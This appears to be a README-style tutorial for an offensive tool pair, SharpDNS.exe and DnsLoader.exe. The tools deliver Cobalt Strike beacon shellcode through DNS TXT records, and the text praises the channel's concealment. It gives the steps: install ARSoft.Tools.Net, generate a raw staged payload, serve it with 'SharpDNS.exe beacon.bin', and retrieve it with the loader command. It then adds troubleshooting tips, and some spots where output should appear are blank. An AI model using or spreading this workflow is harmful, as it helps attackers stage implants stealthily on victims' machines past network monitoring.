Implement a dns server = SharpDNS.exe
Implement a "client" = DnsLoader.exe
Compared with the http protocol, the dns protocol has better concealment. Analogous to the dns beacon of cs, we can implement a dns server to transmit shellcode by ourselves. C# has an excellent third-party library ARSoft.Tools.Net. We can use it for dns query and self-built dns server.
Create a new console project of .net4.0 and install ARSoft.Tools.Net. Because of the .net version problem, we need to install the lower version of ARSoft.Tools.Net. Install-Package ARSoft.Tools.Net -Version 1.8.2
So generate a raw cs payload if you are smart you wont make it stageless because it will be way to big.
Then spinup the DNS server and make sure that the length is the same in wireshark as the one displayed in the terminal. SharpDNS.exe beacon.bin
The output will look like the following:
then simply catch it DnsLoader.exe <DNS> <CDN> 2000
Note that the txt parsing of dns cannot be transmitted too much at a time, and the 2000 used in my test so that there is no problem.
Tada...
If you get the following error this is because youre not running this on the same machine as your DNS. That is because svchost.exe listens to UDP53
Additionally dont try to change the port for the DnsServer because you cant:
